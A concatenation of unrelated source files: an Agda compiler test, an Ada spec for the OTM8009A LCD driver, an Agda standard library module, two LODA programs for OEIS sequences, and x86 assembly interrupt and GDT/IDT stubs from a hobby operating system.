<filename>test/Compiler/simple/Issue4169-2.agda module _ where import Agda.Builtin.Equality open import Agda.Builtin.Sigma open import Agda.Builtin.Unit open import Agda.Primitive open import Common.IO data ⊥ : Set where record R₁ a : Set (lsuc a) where field R : {A : Set a} → A → A → Set a r : {A : Set a} (x : A) → R x x P : Set a → Set a P A = (x y : A) → R x y record R₂ (r : ∀ ℓ → R₁ ℓ) : Set₁ where field f : {X Y : Σ Set (R₁.P (r lzero))} → R₁.R (r (lsuc lzero)) X Y → fst X → fst Y module M (r₁ : ∀ ℓ → R₁ ℓ) (r₂ : R₂ r₁) where open module R₁′ {ℓ} = R₁ (r₁ ℓ) public using (P) open module R₂′ = R₂ r₂ public ⊥-elim : {A : Set} → ⊥ → A ⊥-elim () p : P ⊥ p x = ⊥-elim x open Agda.Builtin.Equality r₁ : ∀ ℓ → R₁ ℓ R₁.R (r₁ _) = _≡_ R₁.r (r₁ _) = λ _ → refl r₂ : R₂ r₁ R₂.f r₂ refl x = x open M r₁ r₂ data Unit : Set where unit : Unit g : Σ Unit λ _ → P (Σ Set P) → ⊥ g = unit , λ h → f (h (⊤ , λ _ _ → refl) (⊥ , p)) tt main : IO ⊤ main = return _
components/src/screen/otm8009a/otm8009a.ads
rocher/Ada_Drivers_Library
192
22507
------------------------------------------------------------------------------ -- -- -- Copyright (C) 2015-2016, AdaCore -- -- -- -- Redistribution and use in source and binary forms, with or without -- -- modification, are permitted provided that the following conditions are -- -- met: -- -- 1. Redistributions of source code must retain the above copyright -- -- notice, this list of conditions and the following disclaimer. -- -- 2. Redistributions in binary form must reproduce the above copyright -- -- notice, this list of conditions and the following disclaimer in -- -- the documentation and/or other materials provided with the -- -- distribution. -- -- 3. Neither the name of the copyright holder nor the names of its -- -- contributors may be used to endorse or promote products derived -- -- from this software without specific prior written permission. -- -- -- -- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -- -- "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -- -- LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -- -- A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -- -- HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -- -- SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -- -- LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -- -- DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -- -- THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -- -- (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -- -- OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -- -- -- ------------------------------------------------------------------------------ with HAL; use HAL; with HAL.DSI; use HAL.DSI; with HAL.Time; package OTM8009A is -- List of OTM8009A commands -- Detailed in OTM8009A data Sheet CMD_NOP : constant := 16#00#; CMD_SWRESET : constant := 16#01#; CMD_RDDMADCTL : constant := 16#0B#; -- Read memory display access ctrl CMD_RDDCOLMOD : constant := 16#0C#; -- Read display pixel format CMD_SLPIN : constant := 16#10#; -- Sleep In command CMD_SLPOUT : constant := 16#11#; -- Sleep Out command CMD_PTLON : constant := 16#12#; -- Partial mode On command CMD_DISPOFF : constant := 16#28#; -- Display OFF command CMD_DISPON : constant := 16#29#; -- Display OFF command CMD_CASET : constant := 16#2A#; -- Column address set command CMD_PASET : constant := 16#2B#; -- Page address set command CMD_RAMWR : constant := 16#2C#; -- Memory (GRAM) write command CMD_RAMRD : constant := 16#2E#; -- Memory (GRAM) read command CMD_PLTAR : constant := 16#30#; -- Partial area command (4 parameters) CMD_TEOFF : constant := 16#34#; -- Tearing Effect Line off command CMD_TEEON : constant := 16#35#; -- Tearing Effect Line on command -- Parameter for CMD_TEEON TEEON_VBLANKING_INFO_ONLY : constant := 0; TEEON_VBLANKING_AND_HBLANKING_INFO : constant := 1; CMD_MADCTR : constant := 16#36#; -- Memory Access write control command -- Parameter for MADCTR MADCTR_MODE_PORTRAIT : constant := 16#00#; MADCTR_MODE_LANDSCAPE : constant := 16#60#; CMD_IDMOFF : constant := 16#38#; -- Idle mode Off command CMD_IDMON : constant := 16#39#; -- Idle mode On command CMD_COLMOD : constant := 16#3A#; -- Interface pixel format command COLMOD_RGB565 : constant := 16#55#; COLMOD_RGB888 : constant := 16#77#; CMD_RAMWRC : constant := 16#3C#; -- Memory write continue command CMD_RAMRDC : constant := 16#3E#; -- Memory read continue command CMD_WRTESCN : constant := 16#44#; -- Write Tearing Effect Scan line CMD_RDSCNL : constant := 16#45#; -- Read Tearing Effect Scan line CMD_WRDISBV : constant := 16#51#; -- Write Display Brightness command CMD_WRCTRLD : constant := 16#53#; -- Write CTRL Display command CMD_WRCABC : constant := 16#55#; -- Write Content Adaptive Brightness CMD_WRCABCMB : constant := 16#5E#; -- Write CABC minimum brightness FREQUENCY_DIVIDER : constant := 2; -- LCD frequency divider type OTM8009A_Color_Mode is (RGB565, RGB888); type LCD_Orientation is (Portrait, Landscape); type OTM8009A_Device (DSI_Host : not null Any_DSI_Port; Channel_ID : DSI_Virtual_Channel_ID; Time : not null HAL.Time.Any_Delays) is tagged limited private; procedure Initialize (This : in out OTM8009A_Device; Color_Mode : OTM8009A_Color_Mode; Orientation : LCD_Orientation); private type OTM8009A_Device (DSI_Host : not null Any_DSI_Port; Channel_ID : DSI_Virtual_Channel_ID; Time : not null HAL.Time.Any_Delays) is tagged limited record Current_Shift : UInt8 := 0; end record; procedure DSI_IO_WriteCmd (This : in out OTM8009A_Device; Data : HAL.DSI.DSI_Data); procedure Write (This : in out OTM8009A_Device; Address : UInt16; Data : HAL.DSI.DSI_Data); procedure Write (This : in out OTM8009A_Device; S_Addr : UInt8; Data : HAL.DSI.DSI_Data); end OTM8009A;
agda-stdlib/src/Algebra/Module/Definitions/Bi.agda
DreamLinuxer/popl21-artifact
5
2313
------------------------------------------------------------------------ -- The Agda standard library -- -- Properties connecting left-scaling and right-scaling ------------------------------------------------------------------------ {-# OPTIONS --without-K --safe #-} open import Relation.Binary -- The properties are parameterised by the three carriers and -- the result equality. module Algebra.Module.Definitions.Bi {a a′ b ℓb} (A : Set a) (A′ : Set a′) {B : Set b} (_≈_ : Rel B ℓb) where open import Algebra.Core Associative : Opₗ A B → Opᵣ A′ B → Set _ Associative _∙ₗ_ _∙ᵣ_ = ∀ x m y → ((x ∙ₗ m) ∙ᵣ y) ≈ (x ∙ₗ (m ∙ᵣ y))
oeis/092/A092763.asm
neoneye/loda-programs
11
14170
<reponame>neoneye/loda-programs ; A092763: a(n) = floor(3^n / n). ; 3,4,9,20,48,121,312,820,2187,5904,16104,44286,122640,341640,956593,2690420,7596480,21523360,61171656,174339220,498112057,1426411800,4093181688,11767897353,33891544377,97764070320,282429536481,817028301962,2366564736720,6863037736488,19924948267224,57906880901620,168456380804712,490505344107840,1429472717114277,4169295424916642,12169835294351280,35548729412447160,103911670590230160,303941636476423220,889585277491970400,2605214026940770457,7633882962663652968,22381156867809346201 add $0,1 mov $1,3 pow $1,$0 div $1,$0 mov $0,$1
src/asm/interrupts.asm
antivir88/BasicOS
0
11996
section .text extern isr_handler extern irq_handler extern gdt_ptr extern idt_ptr global load_gdt global load_idt global load_tss ; Загрузчик GDT векторов load_gdt: lgdt [gdt_ptr] ; Загружает новый указатель GDT mov ax, 0x10 ; 0x10 является смещением, находящимся в таблице GDT и указываемым на наш сегмент данных mov ds, ax ; Загрузка переключателей всех сегментов данных mov es, ax mov fs, ax mov gs, ax mov ss, ax jmp 0x08:.flush ; 0x08 является смещением на наш сегмент кода: Длинный переход! .flush: ret ; Загрузчик IDT векторов load_idt: lidt [idt_ptr] ; Загружает указатель IDT. ret ; Загрузчик TSS load_tss: mov ax, 0x2b ltr ax ret ; IRQ sender to C irq_common_stub: pusha push ds push es push fs push gs mov ax, 0x10 mov ds, ax mov es, ax mov fs, ax mov gs, ax mov eax, esp push eax call irq_handler ; Дёргаем обработчик IRQ ;mov eax, irq_handler ;call eax pop eax pop gs pop fs pop es pop ds popa add esp,8 iret ; ISR sender to C isr_common_stub: pusha push ds push es push fs push gs mov ax, 0x10 mov ds, ax mov es, ax mov fs, ax mov gs, ax mov eax, esp push eax call isr_handler ; Дёргаем обработчик ISR ;mov eax, isr_handler ;call eax pop eax pop gs pop fs pop es pop ds popa add esp, 8 iret ; macro for ISR noerror %macro ISR_NOERRCODE 1 global isr%1 isr%1: cli push byte 0 push byte %1 jmp isr_common_stub %endmacro ; macro for ISR error %macro ISR_ERRCODE 1 global isr%1 isr%1: cli push byte %1 jmp isr_common_stub %endmacro ; macro for IRQ %macro IRQ 2 global irq%1 irq%1: cli push byte 0 push byte %2 jmp irq_common_stub %endmacro ; ISR definitions ISR_NOERRCODE 0 ; 0: Divide By Zero Exception ISR_NOERRCODE 1 ; 1: Debug Exception ISR_NOERRCODE 2 ; 2: Non Maskable Interrupt Exception ISR_NOERRCODE 3 ; 3: Int 3 Exception ISR_NOERRCODE 4 ; 4: INTO Exception ISR_NOERRCODE 5 ; 5: Out of Bounds Exception ISR_NOERRCODE 6 ; 6: Invalid Opcode Exception ISR_NOERRCODE 7 ; 7: Coprocessor Not Available Exception ISR_ERRCODE 8 ; 8: Double Fault Exception (With Error Code!) ISR_NOERRCODE 9 ; 9: Coprocessor Segment Overrun Exception ISR_ERRCODE 10 ; 10: Bad TSS Exception (With Error Code!) ISR_ERRCODE 11 ; 11: Segment Not Present Exception (With Error Code!) ISR_ERRCODE 12 ; 12: Stack Fault Exception (With Error Code!) ISR_ERRCODE 13 ; 13: General Protection Fault Exception (With Error Code!) ISR_ERRCODE 14 ; 14: Page Fault Exception (With Error Code!) ISR_NOERRCODE 15 ; 15: Reserved Exception ISR_NOERRCODE 16 ; 16: Floating Point Exception ISR_NOERRCODE 17 ; 17: Alignment Check Exception ISR_NOERRCODE 18 ; 18: Machine Check Exception ISR_NOERRCODE 19 ; 19: Reserved ISR_NOERRCODE 20 ; 20: Reserved ISR_NOERRCODE 21 ; 21: Reserved ISR_NOERRCODE 22 ; 22: Reserved ISR_NOERRCODE 23 ; 23: Reserved ISR_NOERRCODE 24 ; 24: Reserved ISR_NOERRCODE 25 ; 25: Reserved ISR_NOERRCODE 26 ; 26: Reserved ISR_NOERRCODE 27 ; 27: Reserved ISR_NOERRCODE 28 ; 28: Reserved ISR_NOERRCODE 29 ; 29: Reserved ISR_NOERRCODE 30 ; 30: Reserved ISR_NOERRCODE 31 ; 31: Reserved ; IRQs definitions IRQ 0, 32 ; IRQ0 - timer PIT IRQ 1, 33 ; IRQ1 - keyboard IRQ 2, 34 ; IRQ2 - !cascade! IRQ 3, 35 ; IRQ3 - com2 IRQ 4, 36 ; IRQ4 - com1 IRQ 5, 37 ; IRQ5 - lpt2 IRQ 6, 38 ; IRQ6 - floppy IRQ 7, 39 ; IRQ7 - lpt1 IRQ 8, 40 ; IRQ8 - CMOS clock IRQ 9, 41 ; IRQ9 - free IRQ 10, 42 ; IRQ10 - free IRQ 11, 43 ; IRQ11 - free IRQ 12, 44 ; IRQ12 - PS/2 mouse IRQ 13, 45 ; IRQ13 - FPU IRQ 14, 46 ; IRQ14 - Prim. ATA h.disk IRQ 15, 47 ; IRQ15 - Sec. ATA h.disk
programs/oeis/158/A158325.asm
neoneye/loda
22
2530
<filename>programs/oeis/158/A158325.asm ; A158325: a(n) = 484n^2 + 2n. ; 486,1940,4362,7752,12110,17436,23730,30992,39222,48420,58586,69720,81822,94892,108930,123936,139910,156852,174762,193640,213486,234300,256082,278832,302550,327236,352890,379512,407102,435660,465186,495680,527142,559572,592970,627336,662670,698972,736242,774480,813686,853860,895002,937112,980190,1024236,1069250,1115232,1162182,1210100,1258986,1308840,1359662,1411452,1464210,1517936,1572630,1628292,1684922,1742520,1801086,1860620,1921122,1982592,2045030,2108436,2172810,2238152,2304462,2371740,2439986,2509200,2579382,2650532,2722650,2795736,2869790,2944812,3020802,3097760,3175686,3254580,3334442,3415272,3497070,3579836,3663570,3748272,3833942,3920580,4008186,4096760,4186302,4276812,4368290,4460736,4554150,4648532,4743882,4840200 add $0,1 mov $1,44 mul $1,$0 mul $1,22 add $1,4 mul $1,$0 sub $1,972 div $1,4 mul $1,2 add $1,486 mov $0,$1